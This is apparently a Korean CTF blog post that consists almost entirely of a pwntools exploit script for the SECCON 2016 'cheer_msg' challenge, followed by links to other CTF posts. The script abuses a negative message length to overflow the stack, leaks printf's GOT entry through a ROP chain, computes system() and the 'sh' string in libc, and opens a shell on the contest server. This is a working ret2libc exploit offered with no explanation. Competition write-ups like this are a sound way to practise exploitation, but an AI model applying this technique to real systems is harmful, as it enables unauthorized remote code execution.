1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 | from pwn import * elf = "/root/pwn/seccon/cheer_msg" lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368" #lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so" #s = process(elf) s = remote('cheermsg.pwn.seccon.jp',30527) e = ELF(elf) l = ELF(lib32) DEBUG = 1 if DEBUG == 2: context.log_level = 'debug' print s.recv() s.sendline("-142") print s.recv() ppppr = 0x80487AC main = 0x080484B0 offset = l.symbols['printf'] - l.symbols['system'] #sh = p32(0x08048627) + p32(0x804a090) + p32(0x804a090-1) + p32(100) #sh += p32(0x080485CA) + p32(ppppr + 1) + p32(0x804A020) + p32(20) #sh = p32(0x0804863C) + p32(0x0804A065) #sh = "A"*80+"PPPR12345678asdfzxcv" + "\n" sh = p32(e.symbols['printf']) + p32(main) + p32(e.got['printf']) raw_input() #s.send("A"*0x30+shellcode) s.sendline ( "A"*0x10 + sh) print s.recvuntil("Message : ") print s.recvuntil("\n") leak = u32(s.recv(4)) print "[*] LEAK : %x" % leak print s.recvuntil("Message Length >>") s.sendline("-142") sh = p32(leak - offset) + "AAAA" + p32(leak - (l.symbols['printf'] - list(l.search("sh\x00"))[0])) s.sendline( "A"*0x10 + sh) s.interactive() | cs |
'CTF' 카테고리의 다른 글
codegate 2017 (0) | 2017.02.11 |
---|---|
SECCON_2016 logger (0) | 2016.12.14 |
SECCON_2016 checker (0) | 2016.12.11 |
SECCON_2016 jmper (0) | 2016.12.11 |